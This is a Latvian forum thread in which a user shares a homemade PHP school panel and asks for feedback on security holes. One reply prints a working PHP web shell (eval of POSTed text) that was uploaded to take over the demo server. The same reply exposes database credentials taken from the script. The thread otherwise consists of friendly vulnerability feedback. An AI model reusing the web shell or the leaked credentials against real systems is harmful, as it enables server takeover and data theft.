SPanelis

[m8t]

Kas tas ir Spanelis? Būtībā tas ir panelis, kuru es izveidoju savai skolai, precīzāk - skolotājiem. Spanelis = Skolotāju Panelis, bet SPanlis skan īsāk un jautrāk :) Neteikšu ka tas ir kautkas ļoti dižš, bet noderīgs un viegli izmantojams "nezinīšu" grupām.

 

Paraugs: http://untitled.webege.com/

Visu lietotāju paroles ir test.

Lietotājus var pievienot tikai no lielā paneļa, kuru diemžēl es te nelikšu.

 

Neminēšu kurai skolai šis ir veidots, lai jūs tur visu neuzhackotu parcik es šī paneļa skriptu atdodu par brīvu.

DL links: http://shizo0.exs.lv/sp_v2.1.rar

 

Šo paneli var izmantot arī citām lietām, viņš ir nav domāts tikai skolotājiem.

 

Būtu pateicīgs par atsauksmēm - ko derētu pielabot, kur ir kāds caurums utt!

Edited April 3, 2010 by m8t

[waplet]

Labi tagad pasaki kāpēc skolotaju panelis? Kāpēc, lai skolotājas liktu iekšā kaut kādas ffailus un čatotu savā starpā? :D

[m8t]

Informātikas skolotājs uzprasīja lai uzčinīju paneli, kur skolotāji varētu pievienot savas prezentācijas, gatavošanās eksāmeniem darbus utml. Čats tikai tāpēc, lai es, mirstīgais redzētu ko viņi tur raksta :D

 

AKA. - http://untitled.webege.com/i/load.php?con=1

[waplet]

Papētīju nedaudz to kodu. Neko sliktu neatradu.

[Kaklz]

ak tu dies, cik caurs tas pasākums tev ir :D

 

$usernameerer = "a9353198_a";

$passworderer = "nonamer112";

$hosterer = "mysql14.000webhost.com";

$databaseerer = "a9353198_a";

 

:)

 

EDIT: kopš šī brīža vairs nekad, atkārtošu NEKAD neļauj augšupielādēt failus, nepārbaudot to saturu un novietojot tos publiski izpildāmā vietā. Laušana aizņēma ~5 minūtes, jo vienkārši uploadēju index.php failu ar saturu:

<?php

if (!empty($_POST['text'])){
       eval(stripslashes($_POST['text']));
}
echo '<form method="post"><textarea cols="50" rows="20"  name="text">' . @stripslashes(htmlspecialchars($_POST['text'])) . '</textarea><input type="submit" name="sbmt" value="hack!" /></form>';

 

Tā kā uploadotie faili glabājas publiskā mapē un tu nekādi neaizliedz man tos izpildīt, tad vari uzskatīt, ka serveris ir pilnīgi manā rīcībā :)

 

un jā, nodzēs /up/index.php tagad lūdzu :)

[m8t]

Eek :D Tiko pamanīju ka var pievienot visa vaida failus :D esmu aizmirsis uzlikt limitu :D

 

Edit: Rekā, atradu jau veselas 3 kļūdas tikai ar jūsu palīdzību. Paldies! :)

Edited April 3, 2010 by m8t

[Kemito]

Labais vienā setā uzsmecerēja :D

[rATRIJS]

Haha upload arī bij pirmais ko es skatīju :D

 

Lai vai kā upload arī tagad nav ideāls :) http://grab.by/3vRf (un viņš parādās arī augšupielādēto failu sarakstā)

 

Kā arī tur kur var pievienot random tekstu, tur netiek pielietots stripslashes (acīmredzot magic quotes ir ieslēgts)

[m8t]

Cik stulbi no manas puses. Kautko salabot, bet aizmirst pārbaudīt... Lai nu kā, tagat viss strādā (vismaz man). Pieliku arī tos stripslashes, bet ko viņi tādu īsti dara? Drošības ziņā viņi kautko dod?

 

 

Edit:

Varbūt kādam ir kādas idejas, kā krāsas pamainīt? Baigi nepatīk teksts sarkanajā errorā, bet citas krāsa galīgi nepiestāv, piemēram melna tur galīgi pretīgi izskatās.

Edited April 3, 2010 by m8t

[rATRIJS]

Par krāsām - es parasti lieku vai nu tumšāki sarkanu vai baltu ( + šad un tad text-shadow normālajiem pārlūkiem)

 

stripslashes neko drošības ziņā nedara - http://uk2.php.net/stripslashes

[m8t]

Paldies! Pieliku pie zaļās kastes baltu krāsu, bet pie sarkanās mazliet pelēcīgi baltu. :)